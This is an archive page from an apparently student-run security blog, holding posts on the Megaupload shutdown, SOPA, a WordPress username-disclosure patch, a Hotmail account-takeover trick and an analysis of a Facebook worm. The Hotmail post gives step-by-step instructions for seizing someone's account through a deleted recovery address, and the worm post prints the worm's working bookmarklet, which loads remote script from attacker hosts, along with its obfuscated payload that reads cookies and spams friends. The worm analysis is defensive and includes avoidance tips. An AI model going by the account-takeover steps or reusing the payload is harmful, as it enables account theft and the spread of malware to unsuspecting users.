Web

How the USA Killed my Movie Nights

0
32 jours
by in Web, whatever

Since the FBI announced that megaupload had been closed due to the illegal content they were providing to their users, I have seen a lots of complains, articles speaking about alternatives, and anonymous attacks against multiple websites such as Justin Bieber, but what is the impact on my life ?

 

Since 2005 i was used to exchange files and download (legal) files via megaupload, and now I will have to use another way to exchange my files. I used megaupload at least 4 to5 times a day, but hopefully as an IT Security Student I never trusted megaupload and never upload personal, or private content.  But I can imagine that some people did and they lost almost everything (if it was their only backup) which I think it’s funny (but only because I’m evil).

But with the closing of megaupload, and the deletion of all the illagal content on all the other websites (videobb) I’m pretty sure that many people will have much more time to spend on fancy cool stuff they never did anymore since 2005.

 

  • Discovering the television again 
  • Reading Books
  • Programming a new megaWhatEverWebsite 
  • Join the Anonymous to help with the #OpMegaupload
  • Learn to hack to become Hacktivists
  • Wait 2 years before the next episode of chuck arrives in the UK
and many other fancy things.
I will probably continue to live my life until I find a descent replacement to megaupload to download (legal …) content and to store the files that I have to exchange with my friends.
So basically the world will continue to turn (until December as the mayas said)  but we will have to change our « download » habits.

Megaupload has been taken down by the FBI

0
34 jours
by in Geek, Web

Megaupload website and all its related website has just been taken down by the FBI. Megaupload is sued for copyright infringement, they are also considered by the US government as an « international organized criminal enterprise ».

The FBI website states that megaupload.com  is generating an amount of 175million dollars, and that they cause more than half a billion dollar harm to multiple companies and copyright owners.  Some of the servers of megaupload were located in the state of Virginia, it was thus easy for the FBI to take down all the servers.

 

Seven individuals have been charged, the boss (kim dotcom)  and his associates.

  • Finn Batato, 38, a citizen and resident of Germany, who is the chief marketing officer;
  • Julius Bencko, 35, a citizen and resident of Slovakia, who is the graphic designer;
  • Sven Echternach, 39, a citizen and resident of Germany, who is the head of business development;
  • Mathias Ortmann, 40, a citizen of Germany and resident of both Germany and Hong Kong, who is the chief technical officer, co-founder and director;
  • Andrus Nomm, 32, a citizen of Estonia and resident of both Turkey and Estonia, who is a software programmer and head of the development software division;
  • Bram van der Kolk, aka Bramos, 29, a Dutch citizen and resident of both the Netherlands and New Zealand, who oversees programming and the underlying network structure for the Mega conspiracy websites.

 

Kim, Finn, Mathias and Bram have been arrested today by New Zealand authorities, while the others are still on the run.

 

At the moment I just imagine all the people that uploaded something which is not infringing copyrights and how they feel.  As a student i used to use megaupload to store some  data or file when I didn’t had my USB key … or some other crap,  and it was easy … I imagine also all the people who had paid accounts … etc.

 

Anyway, I believe that megaupload will not come back soon and that multiple other companies which are offering the same services will have many new customers in the next couple of hours !

 

 

This Blog supports the Blackout operation and is against SOPA/PIPA

0
36 jours
by in Security, Web

The USA is about to vote restrictive bills called SOPA and PIPA

These bills will allow the US government to censor websites.

To understand SOPA/PIPA  I invite you to read the following paper:

http://blog.reddit.com/2012/01/technical-examination-of-sopa-and.html

and to have a look at the following video from the Anonymous group.

 

I invite you also to retweet the following link http://sopastrike.com/on-strike/

 

See you soon.

« Hacking » Friends Hotmail’s Accounts

0
82 jours
by in Security, Web

There are a few existing ways of hacking an hotmail account, such as brute-force, or the secrete answer/question, but today I(and friends) found another « way » of doing it (that I never heard before)

Long story short :

To make it work, the hacker needs to know the « save » e-mail address, and hope, this address has been deleted.

When you forgot your password it is possible to ask hotmail to « Email me a reset link« , when clicking on this link hotmail  shows the user the e-mail address to which it is going to send the reset link, for example :

my*****@hotmail.com

But in a few cases, this e-mail address might have been already deleted by hotmail (if you didn’t used it anymore, or if the target didn’t used it anymore), to verify that fact, the hacker can simply  return to the following link:

« Can’t access your account » (on the sign-in page)

From there the hacker can tick the  « I forgot my password » radio buttonfollowing the link the hacker will find the page displayed below :
And here comes the trick :

IF the address does not exist anymore, the hacker will receive the following message :


If hotmail returns the following message the trick is to « recreate » this e-mail such as creating a new account, and then restore the password from the account you wanted to get the password back at first.

 

And that’s it, hotmail will not verify that the previous e-mail had been deleted or not, it will simply send you the restore password link.

 

Have fun.

Patch WordPress UserName Disclosure

2
266 jours
by in Security, Web

This 26 may, a researcher (Veronica Valero of Talsoft S.R.L.) posted  a security threat  affecting  WordPress blogs on Direct Object Reference.

A reply posted by « Zerial » on the mailing list explained another vulnerability on WordPress.

It is possible via a simple test on the login box to know if a username is  used on the blog. The test is pretty simple it analyse the return message while trying to login on WordPress.

For example on the following website (http://www.noktec.be/wp-admin/)  while trying to log with the user-name « test » (fake)

The return message given when the account was active was :

Error: The password you entered for the username test is incorrect. Lost your password ?

 

The return message given when the account was not active was:

Error: Invalid username. Lost your password ?

This vulnerability was already report in the OSVDB 55713 in 2009 but was still active.

A patch was released by « EthicalHack3r » :

 

wp-includes/user.php:91

Change:

 return new WP_Error('invalid_username', sprintf(__('ERROR: Invalid username. Lost your password< /a>?'), site_url('wp-login.php?action=lostpassword', 'login')));

To:

return new WP_Error( 'invalid_username', sprintf( __( 'ERROR: Invalid username and/or password.')));

and change

wp-includes/user.php:111

Change:

return new WP_Error( 'incorrect_password', sprintf( __( 'ERROR: The password you entered for the username %1$s is incorrect. Lost your password?' )

To:

return new WP_Error( 'incorrect_password', sprintf( __( 'ERROR: Invalid username and/or password.')));

( source : EthicalHack3r)

 

And that’s it.

FaceBook worm quick and dirty review

3
312 jours
by in Programmation, Security, Web

Introduction:

Facebook is very popular among the world, and loads of « hackers »/ « script kiddies »  would like to send messages to your contacts for fun and profit. In this little quick and dirty review, I will briefly analyse a worm that spreads on Facebook.

Analyse:

A few minutes ago, I was invited by a friend to a strange event, which told me to click on the following link :

  1. « http://stump.ws/rocibv ».
  2. « http://www.littleurl.net/a5264c »


This link was supposed to give you a trick to see « how much people visited your profile ». Instead you get this ! ( one Event inviting all your friends to do the same and and Pseudo)


 

Once on the page, there was a field containing JavaScript, and they asked people to copy paste this link behind the facebook link, like the following  www.facebook.com/My_Malware_JS_code.


Below you may see the JavaScript code encoded in HexaDecimal (16)

javascript: var _0x80be=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74",
"\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74",
"\x2F\x2F\x69\x61\x62\x65\x6C\x6F\x2E\x63\x6F\x6D\x2F\x65\x2E\x6A\x73",
"\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];
(a=(b=document)[_0x80be[2]](_0x80be[1]))[_0x80be[0]]=_0x80be[3];b[_0x80be[5]][_0x80be[4]](a); void (0);

To understand a bit better what was happening I converted the hex to char and you may see the result below

javascript: var _0x80be=["srcscriptcreateElement","//iabelo.com/e.js","appendChild","body"];(a=(b=document)[_[2]](_0x80be[1]))[_0x80be[0]]=_0x80be[3];b[_0x80be[5]][_0x80be[4]](a); void (0);

Some « hackers » even do not encode the page and it looks like this :

javascript:(a=(b=document).createElement('script')).src='//icalinko.com/styll.js',b.body.appendChild(a);void(0)

 

I’m not a JavaScript expert, but I can read code, and this looked like a call to the website www.iabelo.com/e.js which executed a remote JavaScript file. I copied it, and you may look part of  it below ( again encoded mainly in Hex) To see the code. ( this is not the full code)

var _0x5c0f=["\x53\x61\x6C\x75\x74\x20\x25\x66\x69\x72\x73\x74\x6E\x61\x6D\x65\x25\x20\x20\x4A\x65\x20\x76\x69\x65\x6E\x73\x20\x64\x65\x20\x64\x65\x63\x6F\x75\x76\x72\x69\x72\x20\x71\x75\x65\x20\x76\x6F\x75\x73\x20\x65\x74\x69\x65\x7A\x20\x75\x6E\x20\x64\x65\x20\x6D\x65\x73\x20\x73\x70\x65\x63\x74\x61\x74\x65\x75\x72\x73\x20\x70\x72\x6F\x66\x69\x6C\x20\x68\x61\x75\x74\x2C\x20\x76\x6F\x75\x73\x20\x70\x6F\x75\x76\x65\x7A\x20\x74\x72\x6F\x75\x76\x65\x72\x20\x76\x6F\x74\x72\x65\x20\x65\x78\x65\x6D\x70\x6C\x61\x69\x72\x65\x20\x61\x20\x20\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x75\x6D\x70\x2E\x77\x73\x2F\x72\x6F\x63\x69\x62\x76","\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x20\x25\x74\x66\x25\x0A\x77\x74\x66\x20\x67\x75\x79\x73\x2C\x20\x76\x6F\x75\x73\x20\x65\x73\x74\x20\x61\x70\x70\x61\x72\x75\x20\x63\x6F\x6D\x6D\x65\x20\x6C\x65\x20\x70\x65\x75\x70\x6C\x65\x20\x71\x75\x69\x20\x6D\x27\x61\x20\x6C\x65\x20\x70\x6C\x75\x73\x20\x74\x72\x61\x71\x75\x65\x2C\x20\x76\x6F\x75\x73\x20\x70\x6F\x75\x76\x65\x7A\x20\x76\x6F\x69\x72\x20\x76\x6F\x74\x72\x65\x20\x65\x78\x65\x6D\x70\x6C\x61\x69\x72\x65\x20\x61\x20\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x75\x6D\x70\x2E\x77\x73\x2F\x72\x6F\x63\x69\x62\x76","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x69\x61\x62\x65\x6C\x6F\x2E\x63\x6F\x6D\x2F\x65\x6E\x64\x2E\x70\x68\x70","\x4A\x27\x61\x69\x20\x61\x70\x70\x72\x69\x73\x20\x75\x6E\x65\x20\x66\x61\xE7\x6F\x6E\x20\x64\x65\x20\x76\x6F\x69\x72\x20\x71\x75\x69\x20\x63\x6F\x6E\x73\x75\x6C\x74\x65\x20\x76\x6F\x74\x72\x65\x20\x70\x72\x6F\x66\x69\x6C\x0A\x0A\x53\x75\x69\x76\x65\x7A\x20\x63\x65\x73\x20\xE9\x74\x61\x70\x65\x73\x20\x73\x69\x6D\x70\x6C\x65\x73\x20\x70\x6F\x75\x72\x20\x74\x72\x6F\x75\x76\x65\x72\x3A\x0A\x0A\x74\x6F\x75\x74\x20\x63\x65\x20\x71\x75\x65\x20\x76\x6F\x75\x73\x20\x61\x76\x65\x7A\x20\xE0\x20\x66\x61\x69\x72\x65\x20\x65\x73\x74\x20\x64\x27\x61\x6C\x6C\x65\x72\x20\x73\x75\x72\x20\x63\x65\x20\x6C\x69\x65\x6E\x20\x65\x74\x20\x73\x75\x69\x76\x65\x7A\x20\x6C\x65\x73\x20\x69\x6E\x73\x74\x72\x75\x63\x74\x69\x6F\x6E\x73\x20\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x75\x6D\x70\x2E\x77\x73\x2F\x72\x6F\x63\x69\x62\x76","\x56\x6F\x69\x72\x20\x71\x75\x69\x20\x61\x20\x63\x6F\x6E\x73\x75\x6C\x74\x65\x20\x76\x6F\x74\x72\x65\x20\x70\x72\x6F\x66\x69\x6C\x21","\x56\x6F\x75\x73\x20\x64\x65\x76\x72\x69\x65\x7A\x20\x76\x72\x61\x69\x6D\x65\x6E\x74\x20\x76\x65\x72\x69\x66\x69\x65\x72\x20\x63\x65\x6C\x61\x2E\x20\x49\x6C\x20\x66\x6F\x6E\x63\x74\x69\x6F\x6E\x6E\x65\x20\x76\x72\x61\x69\x6D\x65\x6E\x74\x21","\x43\x27\x65\x73\x74\x20\x6C\x65\x20\x6E\x6F\x75\x76\x65\x61\x75\x20\x63\x6F\x64\x65\x20\x71\x75\x65\x20\x74\x6F\x75\x74\x20\x6C\x65\x20\x6D\x6F\x6E\x64\x65\x20\x61\x20\x70\x61\x72\x6C\x65\x21","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x6F\x70","\x47\x45\x54","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x73\x65\x6E\x64","\x2F","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x40\x5B","\x69\x64","\x3A","\x6E\x61\x6D\x65","\x5D","","\x26","\x3D","\x50\x4F\x53\x54","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x64\x69\x73\x70\x6C\x61\x79","\x73\x74\x79\x6C\x65","\x62\x6C\x6F\x63\x6B","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x61\x62\x73\x6F\x6C\x75\x74\x65","\x77\x69\x64\x74\x68","\x25","\x68\x65\x69\x67\x68\x74","\x6C\x65\x66\x74","\x70\x78","\x74\x65\x78\x74\x41\x6C\x69\x67\x6E","\x63\x65\x6E\x74\x65\x72","\x70\x61\x64\x64\x69\x6E\x67","\x34\x70\x78","\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64","\x23\x46\x46\x46\x46\x46\x46","\x7A\x49\x6E\x64\x65\x78","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x26\x6E\x62\x73\x70\x3B\x3C\x62\x72\x2F\x3E\x50\x6C\x65\x61\x73\x65\x20\x77\x61\x69\x74\x2C\x20\x74\x68\x69\x73\x20\x63\x61\x6E\x20\x74\x61\x6B\x65\x20\x61\x20\x6C\x69\x74\x74\x6C\x65\x20\x77\x68\x69\x6C\x65\x2E\x2E\x2E\x3C\x62\x72\x2F\x3E\x3C\x62\x72\x2F\x3E\x4F\x72\x20\x69\x66\x20\x79\x6F\x75\x20\x67\x65\x74\x20\x73\x69\x63\x6B\x20\x6F\x66\x20\x77\x61\x69\x74\x69\x6E\x67\x2C\x20\x79\x6F\x75\x20\x63\x61\x6E\x20\x3C\x61\x20\x68\x72\x65\x66\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x76\x6F\x69\x64\x28\x30\x29\x3B\x22\x20\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x22\x77\x66\x3D\x30\x3B\x20\x6D\x66\x28\x29\x3B\x22\x3E\x63\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x3C\x2F\x61\x3E\x20\x28\x72\x65\x73\x75\x6C\x74\x73\x20\x6D\x61\x79\x20\x62\x65\x20\x6C\x65\x73\x73\x20\x61\x63\x63\x75\x72\x61\x74\x65\x29","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x64\x61\x74\x61","\x66\x69\x72\x73\x74\x43\x68\x69\x6C\x64","\x6E\x61\x76\x41\x63\x63\x6F\x75\x6E\x74\x4E\x61\x6D\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3F","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x6F\x6F\x73\x65\x2F\x3F\x5F\x5F\x61\x3D\x31","\x65\x76\x65\x6E\x74","\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74","\x2F\x61\x6A\x61\x78\x2F\x74\x79\x70\x65\x61\x68\x65\x61\x64\x2F\x66\x69\x72\x73\x74\x5F\x64\x65\x67\x72\x65\x65\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31\x26\x76\x69\x65\x77\x65\x72\x3D","\x26\x74\x6F\x6B\x65\x6E\x3D","\x26\x66\x69\x6C\x74\x65\x72\x5B\x30\x5D\x3D\x75\x73\x65\x72\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x30\x5D\x3D\x66\x72\x69\x65\x6E\x64\x73\x5F\x6F\x6E\x6C\x79\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x31\x5D\x3D\x6E\x6D\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x32\x5D\x3D\x73\x6F\x72\x74\x5F\x61\x6C\x70\x68\x61","\x6C\x65\x6E\x67\x74\x68","\x70\x75\x73\x68","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x67\x65\x74\x4D\x6F\x6E\x74\x68","\x67\x65\x74\x44\x61\x74\x65","\x67\x65\x74\x46\x75\x6C\x6C\x59\x65\x61\x72","\x67\x65\x74\x48\x6F\x75\x72\x73","\x2C","\x6A\x6F\x69\x6E","\x6F\x6E","\x43\x72\x65\x61\x74\x65\x20\x45\x76\x65\x6E\x74","\x6E\x65\x77","\x2F\x65\x76\x65\x6E\x74\x73\x2F\x63\x72\x65\x61\x74\x65\x2E\x70\x68\x70","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x73\x75\x62\x73\x74\x72","\x28","\x29","\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74","\x70\x61\x79\x6C\x6F\x61\x64","\x6E\x6F\x77\x41\x76\x61\x69\x6C\x61\x62\x6C\x65\x4C\x69\x73\x74","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x25\x66\x69\x72\x73\x74\x6E\x61\x6D\x65\x25","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x66\x69\x72\x73\x74\x4E\x61\x6D\x65","\x75\x73\x65\x72\x49\x6E\x66\x6F\x73","\x72\x65\x70\x6C\x61\x63\x65","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x73\x65\x6E\x64\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x2F\x61\x6A\x61\x78\x2F\x62\x72\x6F\x77\x73\x65\x72\x2F\x66\x72\x69\x65\x6E\x64\x73\x2F\x3F\x75\x69\x64\x3D","\x26\x66\x69\x6C\x74\x65\x72\x3D\x61\x6C\x6C\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x3D\x31","\x73\x68\x69\x66\x74","\x66\x65\x74\x63\x68\x65\x64\x20\x66\x72\x69\x65\x6E\x64\x73\x3A\x20","\x68\x6F\x6D\x65","\x70\x6F\x70","\x25\x74\x66\x25","\x73\x65\x61\x72\x63\x68","\x78\x68\x70\x63\x5F\x6D\x65\x73\x73\x61\x67\x65\x5F\x74\x65\x78\x74","\x78\x68\x70\x63\x5F\x6D\x65\x73\x73\x61\x67\x65","\x6D\x65\x73\x73\x61\x67\x65\x20\x74\x65\x78\x74\x3A\x20","\x2F\x61\x6A\x61\x78\x2F\x75\x70\x64\x61\x74\x65\x73\x74\x61\x74\x75\x73\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x70\x72\x6F\x66\x69\x6C\x65"]

Once decoded in readable characters it appeared like the following :

var _0x5c0f=["Salut %firstname%  Je viens de decouvrir que vous etiez un de mes spectateurs profil haut, vous pouvez trouver votre exemplaire a  http://stump.ws/rocibv""%tf% %tf% %tf% %tf% %tf% %tf%
wtf guys, vous est apparu comme le peuple qui m'a le plus traque, vous pouvez voir votre exemplaire a http://stump.ws/rocibv""http://www.iabelo.com/end.php""J'ai appris une façon de voir qui consulte votre profil
Suivez ces étapes simples pour trouver:
tout ce que vous avez à faire est d'aller sur ce lien et suivez les instructions http://stump.ws/rocibv"

'Voir qui a consulte votre profil!"

"Vous devriez vraiment verifier cela. Il fonctionne vraiment!""C'est le nouveau code que tout le monde a parle!"

"href"

"location""top""GET"

"open"

"onreadystatechange""readyState""status""responseText"

"send"

"/"

"match""cookie""@[""id"":""name""]""""&""=""POST""Content-Type"

"application/x-www-formurlencoded""setRequestHeader""div""createElement""display"
"style""block""position""absolute""width""%""height""left""px""textAlign""center""padding""4px""background""#FFFFFF""zIndex""innerHTML"" 
Please wait, this can take a little while...

Or if you get sick of waiting, you can click here (results may be less accurate)"

"appendChild""body""data""firstChild""navAccountName""getElementById""?""/ajax/choose/?__a=1""event""AsyncRequest"

"/ajax/typeahead/first_degree.php?__a=1&viewer="

"&token=""&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha""length""push""getTime""setTime""getMonth""getDate""getFullYear""getHours"",""join""on""Create Event""new""/events/create.php""/ajax/chat/buddy_list.php?__a=1""substr""("")""buddy_list""payload""nowAvailableList""random""floor"

"%firstname%""toLowerCase""firstName""userInfos""replace""/ajax/chat/send.php?__a=1""/ajax/browser/friends/?uid=""&filter=all&__a=1&__d=1""shift""fetched friends: ""home""pop""%tf%""search""xhpc_message_text""xhpc_message""message text: ""/ajax/updatestatus.php?__a=1""profile"];

As I said, I’m not an expert in JavaScript, but part of the quotes are messages, that should be posted somewhere, and the other parts are links and JavaScript commands requesting the creation of a group, and the creation of some chat messages, to all the contacts, as well as the browsing of all the contacts probably to « post » the creation of the group  to everybody.

My analysis of the worm will not go further because I have no much  time, but it gives an idea of « how it works » , and on what may happen to people who are clicking everywhere and copying strange links on facebook.

 

Btw: It looks like, telling people they will know who viewed their profile is very attractive to lambda users, because I got about 20 of those propositions now. If someone is going further in the analyse let me know I would be pleased to read « full » article on it.

 

How to avoid this ? (conclusion)

  • Look the kind of link  pasted ( if it looks strange, do not click on it).
  • If you don’t really know what is going on, ask a friend to look at it with you ( before clicking on whatever).
  • In this case the « french » used  is really bad, this may be a very good clue !
  • Having an updated anti virus « may » / « could » / « should » help you.
  • If the link seems obvious ( a daughter had sex with her [whoever]) YES IT’s A TRAP !
  • The cake is a lie, don’t rely on it !

Please do not click on what ever link,  this kind of links may do many things, such as allowing people to view your pictures, or retrieve many informations you « set » as confidential , and many other stuff (which are only limited by the imagination of the hacker).

 

Get Adobe Flash playerPlugin by wpburn.com wordpress themes
Go to Top